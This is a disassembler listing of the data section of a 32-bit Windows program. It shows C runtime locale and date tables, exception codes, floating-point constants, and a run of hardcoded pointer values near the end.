asc_442F70 db ' ',9,'-',0Dh,']',0 ; DATA XREF: sub_41FBE0:loc_420002�o
align 4
asc_442F78: ; DATA XREF: sub_41FBE0:loc_41FFDD�o
unicode 0, <]>,0
align 10h
off_442F80 dd offset dword_492760 ; DATA XREF: sub_4210E0+B3�o
; sub_421230+3�o ...
align 8
dd offset dword_492760
dd 101h
dword_442F90 dd 0FFFFFFFFh ; DATA XREF: sub_4210E0+11C�w
dd 0
dd 1000h, 0
dword_442FA0 dd 3 dup(0) ; DATA XREF: sub_41E810+111�o
; sub_423FC0:loc_424013�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_442FC0 dd 3 dup(0) ; DATA XREF: sub_41E810+11A�o
; sub_423FC0:loc_424025�o
dd 2, 0FFFFFFFFh, 83h dup(0)
dword_4431E0 dd 8 dup(0) ; DATA XREF: sub_421230+C�o
; sub_4212A0+C�o
off_443200 dd offset sub_422DF0 ; DATA XREF: sub_41A370+3�w
; sub_41EA90+6AD�r
off_443204 dd offset sub_422800 ; DATA XREF: sub_41A370+D�w
; sub_41EA90+6F1�r
off_443208 dd offset sub_422910 ; DATA XREF: sub_41A370+17�w
; sub_41FBE0+1138�r
off_44320C dd offset sub_422750 ; DATA XREF: sub_41A370+21�w
; sub_41EA90+6CF�r
off_443210 dd offset sub_4228E0 ; DATA XREF: sub_41A370+2B�w
off_443214 dd offset sub_422DF0 ; DATA XREF: sub_41A370+35�w
dword_443218 dd 1 ; DATA XREF: sub_422E80+2C�r
dword_44321C dd 16h ; DATA XREF: sub_422E80+3D�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_443380 dd 43h ; DATA XREF: sub_423690:loc_4237FC�o
; .data:004434A0�o ...
dword_443384 dd 43h, 20h dup(0) ; DATA XREF: sub_423930+8D�o
; sub_423930+117�o ...
dword_443408 dd 43h, 21h dup(0) ; DATA XREF: sub_423930+74�o
; sub_423930+FC�o ...
off_443490 dd offset aLc_all ; DATA XREF: .text:0042341F�r
; .text:00423438�r ...
; "LC_ALL"
dword_443494 dd 0 ; DATA XREF: .text:00423317�r
; .text:004235C0�r ...
off_443498 dd offset sub_423AC0 ; DATA XREF: sub_423690+12B�r
dd offset aLc_collate ; "LC_COLLATE"
dd offset dword_443380
dd offset sub_42AC30
dd offset dword_433020+38h
off_4434AC dd offset dword_443380 ; DATA XREF: sub_423830+F0�r
dd offset sub_42A890
dd offset dword_433020+2Ch
dd offset dword_443380
dd offset sub_42A430
dd offset dword_433020+20h
dd offset dword_443380
dd offset sub_42A100
dd offset dword_433020+18h
dd offset dword_443380
dd offset sub_429780
byte_4434D8 db 1 ; DATA XREF: sub_4241C0+12F�r
db 2, 4, 8
align 10h
dword_4434E0 dd 3A4h ; DATA XREF: sub_4241C0+7E�r
word_4434E4 dw 8260h ; DATA XREF: sub_4241C0+192�r
dw 8279h
dd 21h, 0
dword_4434F0 dd 0DFA6h ; DATA XREF: sub_4241C0+D5�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_4435D0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_41F9F0+6�o
; .text:0041FB7E�o ...
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_443648 dd 3 ; DATA XREF: sub_424F60+98�r
; sub_424F60:loc_42500B�r ...
dword_44364C dd 7 ; DATA XREF: sub_424F60+B1�r
; sub_426880+17D�r
dword_443650 dd 78h ; DATA XREF: .text:004266F8�r
; .text:00426716�r
dword_443654 dd 0Ah ; DATA XREF: sub_425120+1D�r
; sub_425120:loc_425152�r ...
dword_443658 dd 0FFFFFFFFh, 0A00h, 7 dup(0) ; DATA XREF: sub_41E810:loc_41EA09�o
; sub_421790:loc_4218E6�o
dword_44367C dd 19930520h, 4 dup(0) ; DATA XREF: .text:00425F5B�o
; sub_425F62+2�o
dword_443690 dd 2 ; DATA XREF: sub_4260B0+2A�r
; sub_4260B0+3D�r ...
off_443694 dd offset aR6002FloatingP ; DATA XREF: sub_4260B0+56�r
; sub_4260B0+98�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 43332Ch, 9, 433300h, 0Ah, 4332DCh, 10h, 4332B0h
dd 11h, 433280h, 12h, 43325Ch, 13h, 433230h, 18h, 4331F8h
dd 19h, 4331D0h, 1Ah, 433198h, 1Bh, 433160h, 1Ch, 433138h
dd 78h, 433128h, 79h, 433118h, 7Ah, 433108h, 0FCh, 433104h
dd 0FFh, 4330F4h
dword_443720 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_4292C0+3�o
dword_443738 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_4292E0+3�o
dword_443750 dd 40Ah ; DATA XREF: sub_42B7E0+3E�r
; sub_42B7E0+147�r
a040a db '040a',0 ; DATA XREF: sub_42B7E0+9A�o
align 4
off_44375C dd offset aSpanishTraditi ; DATA XREF: sub_42B7E0+AB�r
; "Spanish - Traditional Sort"
dword_443760 dd 505345h ; DATA XREF: sub_42B7E0+BC�o
off_443764 dd offset aSpain ; DATA XREF: sub_42B7E0+CD�r
; "Spain"
dword_443768 dd 505345h ; DATA XREF: sub_42B7E0+DE�o
dword_44376C dd 303538h, 0 ; DATA XREF: sub_42B7E0+EF�o
a1252 db '1252',0 ; DATA XREF: sub_42B7E0+100�o
align 4
dd 40Bh, 62303430h, 0
dd offset aFinnish ; "Finnish"
dd 4E4946h, 4335D4h, 4E4946h, 303538h, 0
a1252_0 db '1252',0
align 4
dd 40Ch, 63303430h, 0
dd offset aFrench ; "French"
dd offset loc_415243+3
dd offset aFrance ; "France"
dd offset loc_415243+3
dd 303538h, 0
a1252_1 db '1252',0
align 4
dd 40Fh, 66303430h, 0
dd offset aIcelandic ; "Icelandic"
dd 4C5349h, 4335B0h, 4C5349h, 303538h, 0
a1252_2 db '1252',0
align 10h
dd 41Dh, 64313430h, 0
dd offset aSwedish ; "Swedish"
dd offset byte_455653
dd offset aSweden ; "Sweden"
dd offset byte_455753
dd 303538h, 0
a1252_3 db '1252',0
align 4
dd 42Dh, 64323430h, 0
dd offset aBasque ; "Basque"
dd 515545h, 4335E4h, 505345h, 303538h, 0
a1252_4 db '1252',0
align 4
db 0Ah
db 8,0
align 4
a080a db '080a',0
align 4
dd offset aSpanish ; "Spanish"
dd 4D5345h, 433588h, 58454Dh, 303538h, 0
a1252_5 db '1252',0
align 4
dd 80Ch, 63303830h, 0
dd offset aFrench ; "French"
dd offset loc_425246
dd offset aBelgium ; "Belgium"
dd 4C4542h, 303538h, 0
a1252_6 db '1252',0
align 10h
dd 0C07h, 37306330h, 0
dd offset aGerman ; "German"
dd offset loc_414544
dd offset aAustria ; "Austria"
dd 545541h, 303538h, 0
a1252_7 db '1252',0
align 4
dd 0C09h, 39306330h, 0
dd offset aEnglish ; "English"
dd offset loc_414E40+5
dd offset aAustralia ; "Australia"
dd 535541h, 303538h, 0
a1252_8 db '1252',0
align 4
dd 0C0Ah, 61306330h, 0
dd offset aSpanishModernS ; "Spanish - Modern Sort"
dd 4E5345h, 4335E4h, 505345h, 303538h, 0
a1252_9 db '1252',0
align 4
dd 0C0Ch, 63306330h, 0
dd offset aFrench ; "French"
dd offset dword_435230+16h
dd offset aCanada ; "Canada"
dd 4E4143h, 303538h, 0
a1252_10 db '1252',0
align 10h
dd 100Ah, 61303031h, 0
dd offset aSpanish ; "Spanish"
dd offset byte_475345
dd offset aGuatemala ; "Guatemala"
dd 4D5447h, 303538h, 0
a1252_11 db '1252',0
align 4
dd 100Ch, 63303031h, 0
dd offset aFrench ; "French"
dd 535246h, 433524h, 454843h, 303538h, 0
a1252_12 db '1252',0
align 4
dd 140Ah, 61303431h, 0
dd offset aSpanish ; "Spanish"
dd offset dword_43533C+9
dd offset aCostaRica ; "Costa Rica"
dd offset byte_495243
dd 303538h, 0
a1252_13 db '1252',0
align 4
dd 140Ch, 63303431h, 0
dd offset aFrench ; "French"
dd 4C5246h, 43350Ch, 58554Ch, 303538h, 0
a1252_14 db '1252',0
align 10h
dd 180Ah, 61303831h, 0
dd offset aSpanish ; "Spanish"
dd offset loc_415345
dd offset aPanama ; "Panama"
dd 4E4150h, 303538h, 0
a1252_15 db '1252',0
align 4
dd 1C09h, 39306331h, 0
dd offset aEnglish ; "English"
dd 534E45h, 4334F4h, 46415Ah, 373334h, 0
a1252_16 db '1252',0
align 4
dd 1C0Ah, 61306331h, 0
dd offset aSpanish ; "Spanish"
dd offset byte_445345
dd offset aDominicanRepub ; "Dominican Republic"
dd 4D4F44h, 303538h, 0
a1252_17 db '1252',0
align 4
db 0Ah
db ' ',0
align 4
a200a db '200a',0
align 10h
dd offset aSpanish ; "Spanish"
dd 565345h, 4334D4h, 4E4556h, 303538h, 0
a1252_18 db '1252',0
align 10h
db 0Ah
db '$',0
align 4
a240a db '240a',0
align 4
dd offset aSpanish ; "Spanish"
dd 4F5345h, 4334C8h, 4C4F43h, 303538h, 0
a1252_19 db '1252',0
align 4
db 0Ah
db '(',0
align 10h
a280a db '280a',0
align 4
dd offset aSpanish ; "Spanish"
dd 525345h, 4334C0h, 524550h, 303538h, 0
a1252_20 db '1252',0
align 4
db 0Ah
db ',',0
align 4
a2c0a db '2c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 535345h, 4334B4h, 475241h, 303538h, 0
a1252_21 db '1252',0
align 4
a0 db 0Ah
db '0',0
align 4
a300a db '300a',0
align 10h
dd offset aSpanish ; "Spanish"
dd offset byte_465345
dd offset aEcuador ; "Ecuador"
dd 554345h, 303538h, 0
a1252_22 db '1252',0
align 10h
a4 db 0Ah
db '4',0
align 4
a340a db '340a',0
align 4
dd offset aSpanish ; "Spanish"
dd 4C5345h, 4334A4h, 4C4843h, 303538h, 0
a1252_23 db '1252',0
align 4
a8 db 0Ah
db '8',0
align 10h
a380a db '380a',0
align 4
dd offset aSpanish ; "Spanish"
dd 595345h, 43349Ch, 595255h, 303538h, 0
a1252_24 db '1252',0
align 4
db 0Ah
db '<',0
align 4
a3c0a db '3c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 5A5345h, 433490h, 595250h, 303538h, 0
a1252_25 db '1252',0
align 4
word_443BF4 dw 0C0Ch ; DATA XREF: sub_42B6B0+34�r
dw 0C1Ah
dd 4361007h, 42D080Ch, 100C0403h, 81D0810h
off_443C08 dd offset aAmerica ; DATA XREF: sub_42ACC0+9C�o
; "america"
dd offset loc_415354+1
dd offset aBritain ; "britain"
dd 524247h, 4336E4h, 4E4843h, 4336DCh, 455A43h, 4336D4h
dd 524247h, 4336C4h, 524247h, 4336BCh, 444C4Eh, 4336B0h
dd 474B48h, 4336A4h, 4C5A4Eh, 4336A0h, 4C5A4Eh, 433694h
dd 4E4843h, 433688h, 4E4843h, 43367Ch, 495250h, 433674h
dd 4B5653h, 433664h, 46415Ah, 433658h, 524F4Bh, 433648h
dd 46415Ah, 43363Ch, 524F4Bh, 433628h, 4F5454h, 433704h
dd 524247h, 433618h, 524247h, 433608h, 415355h, 433700h
dd 415355h
off_443CC0 dd offset aAmerican ; DATA XREF: sub_42ACC0+67�o
; "american"
dd 554E45h, 433AF0h, 554E45h, 433ADCh, 554E45h, 433AD0h
dd 414E45h, 433AC8h, 424C4Eh, 433ABCh, 434E45h, 433AB8h
dd 48485Ah, 433AB4h, 49485Ah, 433AACh, 534843h, 433A98h
dd 48485Ah, 433A84h, 534843h, 433A70h, 49485Ah, 433A5Ch
dd 544843h, 433A4Ch, 424C4Eh, 433A38h, 554E45h, 433A2Ch
dd 414E45h, 433A1Ch, 4C4E45h, 433A10h, 434E45h, 4339FCh
dd 424E45h, 4339F0h, 494E45h, 4339E0h, 4A4E45h, 4339D4h
dd 5A4E45h, 4339BCh, 534E45h, 4339A0h, 544E45h, 433994h
dd 474E45h, 433988h, 554E45h, 43397Ch, 554E45h, 43396Ch
dd 425246h, 43395Ch, 435246h, 433948h, 4C5246h, 433938h
dd 535246h, 433928h, 414544h, 433914h, 434544h, 433900h
dd 4C4544h, 4338F0h, 534544h, 4338E0h, 494E45h, 4338D0h
dd 535449h, 4338C4h, 524F4Eh, 4338B0h, 524F4Eh, 43389Ch
dd 4E4F4Eh, 433884h, 425450h, 433870h, 535345h, 433860h
dd 425345h, 433850h, 4C5345h, 43383Ch, 4F5345h, 433828h
dd 435345h, 43380Ch, 445345h, 4337FCh, 465345h, 4337E8h
dd 455345h, 4337D4h, 475345h, 4337C0h, 485345h, 4337B0h
dd 4D5345h, 4337A0h, 4E5345h, 43378Ch, 495345h, 43377Ch
dd 415345h, 433768h, 5A5345h, 433758h, 525345h, 433744h
dd 555345h, 433734h, 595345h, 433720h, 565345h, 433710h
dd 465653h, 433708h, 534544h, 433704h, 474E45h, 433700h
dd 554E45h, 4336FCh, 554E45h
dword_443EC8 dd 7080h ; DATA XREF: sub_423ED0+92�r
; sub_42BAC0+80�w ...
dword_443ECC dd 1 ; DATA XREF: sub_423ED0+C2�r
; sub_42BAC0+BF�w ...
dword_443ED0 dd 0FFFFF1F0h ; DATA XREF: sub_423ED0+DE�r
; sub_42BAC0+D7�w ...
dword_443ED4 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:off_443F54�o
dword_443F14 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:off_443F58�o
off_443F54 dd offset dword_443ED4 ; DATA XREF: sub_42BAC0+FA�r
; sub_42BAC0+123�r ...
off_443F58 dd offset dword_443F14 ; DATA XREF: sub_42BAC0+140�r
; sub_42BAC0+16A�r ...
align 10h
dword_443F60 dd 0FFFFFFFFh ; DATA XREF: sub_42BAC0+30�w
; sub_42BEA0+1A�r ...
dword_443F64 dd 0 ; DATA XREF: sub_42BEA0:loc_42C09B�r
; sub_42BEA0+20F�r ...
dword_443F68 dd 0 ; DATA XREF: sub_42BEA0+2CF�r
; sub_42C1A0+13D�w
align 10h
dword_443F70 dd 0FFFFFFFFh ; DATA XREF: sub_42BAC0+21�w
; sub_42BAC0+2B�r ...
dword_443F74 dd 0 ; DATA XREF: sub_42BEA0+201�r
; sub_42BEA0+21D�r ...
dword_443F78 dd 0 ; DATA XREF: sub_42BEA0+2E5�r
; sub_42C1A0+1D�r ...
dword_443F7C dd 0FFFFFFFFh ; DATA XREF: sub_42C1A0+B0�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_443FAC dd 16Dh ; DATA XREF: sub_423ED0+2E�r
; sub_42C1A0+2C�r ...
dword_443FB0 dd 0FFFFFFFFh ; DATA XREF: sub_42C1A0+BF�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch
off_443FE4 dd offset off_443FE8 ; DATA XREF: sub_429780+70�w
; sub_429780:loc_429821�w ...
off_443FE8 dd offset aSun ; DATA XREF: sub_429780:loc_429821�o
; .data:off_443FE4�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm_0 ; "AM"
dd offset aPm_1 ; "PM"
dd offset aMDYy ; "M/d/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHMmSs ; "H:mm:ss"
align 8
dword_444098 dd 2Eh, 0 ; DATA XREF: sub_42A100+EE�o
; .data:off_4440A0�o
off_4440A0 dd offset dword_444098 ; DATA XREF: sub_42A430+D4�w
; sub_42A430+F6�o ...
off_4440A4 dd offset dword_4923F8 ; DATA XREF: sub_42A430+E2�w
off_4440A8 dd offset dword_4923F8 ; DATA XREF: sub_42A430+F1�w
dd offset dword_4923F8
dd offset dword_4923F8
dd offset dword_4923F8
dd offset dword_4923F8
dd offset dword_4923F8
dd offset dword_4923F8
dd offset dword_4923F8
dd 2 dup(7F7F7F7Fh)
off_4440D0 dd offset off_4440A0 ; DATA XREF: sub_42A100:loc_42A1E9�r
; sub_42A100+F8�r ...
align 10h
dword_4440E0 dd 2 dup(0) ; DATA XREF: sub_42FDD0+6�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_444240 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_42FDD0+2A�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 2 dup(0)
byte_4443A4 db 0 ; DATA XREF: sub_401000+36�r
align 4
dword_4443A8 dd 0 ; DATA XREF: sub_401000+9C�o
dword_4443AC dd 0 ; DATA XREF: sub_401000+A1�o
byte_4443B0 db 0 ; DATA XREF: sub_4010E6+37�r
align 8
dword_4443B8 dd 0 ; DATA XREF: sub_40291D+18�r
; sub_402D70+92�w ...
dword_4443BC dd 0 ; DATA XREF: sub_403076+4D�r
; sub_40328A+D9�w ...
dd 3E1h dup(0)
db 0
byte_445345 db 3 dup(0) ; DATA XREF: .data:00443A78�o
dd 4 dup(0)
dword_445358 dd 6 dup(0) ; DATA XREF: sub_403076+CF�o
; sub_403076+138�o ...
dword_445370 dd 0 ; DATA XREF: sub_402994+82�w
; sub_402994+102�o
dword_445374 dd 41h dup(0) ; DATA XREF: sub_402994+41�o
dword_445478 dd 41h dup(0) ; DATA XREF: sub_402994+63�o
dword_44557C dd 0 ; DATA XREF: sub_402994+F8�w
; sub_402994+114�r
dword_445580 dd 0 ; DATA XREF: sub_402994+52�w
dword_445584 dd 0 ; DATA XREF: sub_402994+4D�w
; sub_402994+CF�r
dword_445588 dd 20h dup(0) ; DATA XREF: sub_402994+9A�o
; sub_402994+BA�o
dword_445608 dd 0 ; DATA XREF: sub_402994+8F�w
dword_44560C dd 0 ; DATA XREF: sub_402994+A7�w
; sub_402994+C7�w
dword_445610 dd 0 ; DATA XREF: sub_402994:loc_402ABE�r
align 8
dword_445618 dd 0 ; DATA XREF: sub_402994+2D5�w
; sub_402994+32E�o
dword_44561C dd 4Dh dup(0) ; DATA XREF: sub_402994+2C3�o
dword_445750 dd 55h dup(0) ; DATA XREF: .data:off_438694�o
dword_4458A4 dd 41h dup(0) ; DATA XREF: sub_402994+28D�o
dword_4459A8 dd 0 ; DATA XREF: sub_402994+2BA�w
; sub_402994+2E1�r
align 10h
dword_4459B0 dd 0 ; DATA XREF: sub_402994+324�w
; sub_402994+340�r
dword_4459B4 dd 0 ; DATA XREF: sub_402994+2E7�w
dword_4459B8 dd 0 ; DATA XREF: sub_402994+2F4�w
dword_4459BC dd 0 ; DATA XREF: sub_402994+2B4�w
dd 0
dword_4459C4 dd 0 ; DATA XREF: sub_402994:loc_402CEA�r
dword_4459C8 dd 0 ; DATA XREF: sub_402994+1A1�w
; sub_402994+221�o
dword_4459CC dd 41h dup(0) ; DATA XREF: sub_402994+163�o
dword_445AD0 dd 41h dup(0) ; DATA XREF: sub_402994+182�o
dword_445BD4 dd 0 ; DATA XREF: sub_402994+217�w
; sub_402994+233�r
dword_445BD8 dd 0 ; DATA XREF: sub_402994+171�w
dword_445BDC dd 0 ; DATA XREF: sub_402994+1EE�r
dword_445BE0 dd 20h dup(0) ; DATA XREF: sub_402994+1B9�o
; sub_402994+1D9�o
dword_445C60 dd 0 ; DATA XREF: sub_402994+1AE�w
dword_445C64 dd 0 ; DATA XREF: sub_402994+1C6�w
; sub_402994+1E6�w
dword_445C68 dd 0 ; DATA XREF: sub_402994:loc_402BDE�r
align 10h
dword_445C70 dd 1000h dup(0) ; DATA XREF: sub_4035E1+1D�o
; .text:004036CB�o ...
dword_449C70 dd 0 ; DATA XREF: sub_4035E1+13�o
; .text:00403712�o ...
dword_449C74 dd 0 ; DATA XREF: sub_403B83+F�r
; sub_403D7C+12�r
dd 18h dup(0)
dword_449CD8 dd 2 dup(0) ; DATA XREF: sub_40449C:loc_40452F�o
dword_449CE0 dd 0 ; DATA XREF: sub_405084+431�o
dword_449CE4 dd 0Eh dup(0) ; DATA XREF: sub_4055AD+F�o
dword_449D1C dd 2 dup(0) ; DATA XREF: sub_405938+C8�o
dword_449D24 dd 0 ; DATA XREF: sub_405938+62�o
dword_449D28 dd 80h dup(0) ; DATA XREF: sub_406355+41�o
dword_449F28 dd 200h dup(0) ; DATA XREF: sub_405C86+C7�o
; sub_405FE1+DD�o ...
dword_44A728 dd 200h dup(0) ; DATA XREF: sub_405C86+D6�o
; sub_405FE1+F4�o ...
dword_44AF28 dd 0 ; DATA XREF: sub_405C86+86�w
; sub_405E58+94�r
dword_44AF2C dd 0 ; DATA XREF: sub_405C86+A7�w
; sub_4062BE+55�r ...
dword_44AF30 dd 0 ; DATA XREF: sub_405C86+A0�w
; sub_405E58+D6�r ...
dword_44AF34 dd 0 ; DATA XREF: sub_405C86+79�w
; sub_405E58+35�r ...
dword_44AF38 dd 80h dup(0) ; DATA XREF: sub_4062BE+5E�o
dword_44B138 dd 0 ; DATA XREF: sub_405C86+93�w
; sub_405E58+A2�r
align 10h
dword_44B140 dd 0 ; DATA XREF: sub_405C86+E7�o
; sub_405C86+103�r ...
dword_44B144 dd 0 ; DATA XREF: sub_405FE1+17B�w
; sub_406188+107�w
dword_44B148 dd 0 ; DATA XREF: sub_405FE1+180�w
; sub_406188+10D�w ...
dword_44B14C dd 0 ; DATA XREF: sub_405FE1+159�w
; sub_4062BE+4F�r
dword_44B150 dd 0 ; DATA XREF: sub_406C1D+2A�w
; sub_406C1D+51�r ...
dword_44B154 dd 0 ; DATA XREF: sub_401A3C+AC�r
; sub_406614+72�w ...
dd 3 dup(0)
dword_44B164 dd 0 ; DATA XREF: sub_407D34+74�o
byte_44B168 db 0 ; DATA XREF: sub_407E55+1D3�w
; sub_407E55+2D2�o
align 2
word_44B16A dw 0 ; DATA XREF: sub_407E55+1E3�w
word_44B16C dw 0 ; DATA XREF: sub_407E55+1E9�w
word_44B16E dw 0 ; DATA XREF: sub_407E55+1F0�w
byte_44B170 db 0 ; DATA XREF: sub_407E55+1F7�w
byte_44B171 db 0 ; DATA XREF: sub_407E55+1FE�w
word_44B172 dw 0 ; DATA XREF: sub_407E55+204�w
dword_44B174 dd 0 ; DATA XREF: sub_407E55+234�w
; sub_407E55+250�w
dword_44B178 dd 0 ; DATA XREF: sub_407E55+258�w
byte_44B17C db 0 ; DATA XREF: sub_407E55+26A�w
byte_44B17D db 0 ; DATA XREF: sub_407E55+27D�w
word_44B17E dw 0 ; DATA XREF: sub_407E55+295�w
word_44B180 dw 0 ; DATA XREF: sub_407E55+2A4�w
word_44B182 dw 0 ; DATA XREF: sub_407E55+29C�w
dword_44B184 dd 101h dup(0) ; DATA XREF: sub_407E55+2B9�o
dword_44B588 dd 77C72C6Bh ; DATA XREF: sub_403948+210�r
; sub_403948+21A�r ...
dword_44B58C dd 77EBA994h ; DATA XREF: sub_40888A+65�w
; sub_40B4F2+166�r
dword_44B590 dd 7622A3F4h ; DATA XREF: sub_40888A+7ED�w
; sub_40888A+862�r ...
dword_44B594 dd 71C45229h ; DATA XREF: sub_40888A+9BA�w
; sub_40888A+A18�r ...
dword_44B598 dd 71C24870h ; DATA XREF: sub_40888A+96C�w
; sub_40888A+9E8�r ...
dword_44B59C dd 77C71BB0h ; DATA XREF: sub_403948+D1�r
; sub_40888A+46F�w ...
dword_44B5A0 dd 77D4808Bh ; DATA XREF: sub_4085A9+EC�r
; sub_4085A9+109�r ...
dword_44B5A4 dd 71C4502Ch ; DATA XREF: sub_40888A+9AD�w
; sub_40888A+A10�r ...
dword_44B5A8 dd 77DE801Bh ; DATA XREF: sub_40888A+354�w
; sub_40888A+3A9�r ...
dword_44B5AC dd 77DDACABh ; DATA XREF: sub_40888A+3F1�w
; sub_415430+11E�r
dword_44B5B0 dd 77DE8075h ; DATA XREF: sub_40888A+361�w
; sub_40888A+3B1�r ...
dword_44B5B4 dd 77DD7496h ; DATA XREF: sub_40888A+3A2�w
; sub_40A48F+AD�r
dword_44B5B8 dd 71AB1B7Bh ; DATA XREF: sub_406D34+115�r
; sub_40888A+53C�w ...
dword_44B5BC dd 77E686CCh ; DATA XREF: sub_405675+1B�r
; sub_40888A+72�w ...
dword_44B5C0 dd 71C2498Bh ; DATA XREF: sub_40888A+95F�w
; sub_40888A+9DB�r ...
dword_44B5C4 dd 77DDAB2Fh ; DATA XREF: sub_40888A+388�w
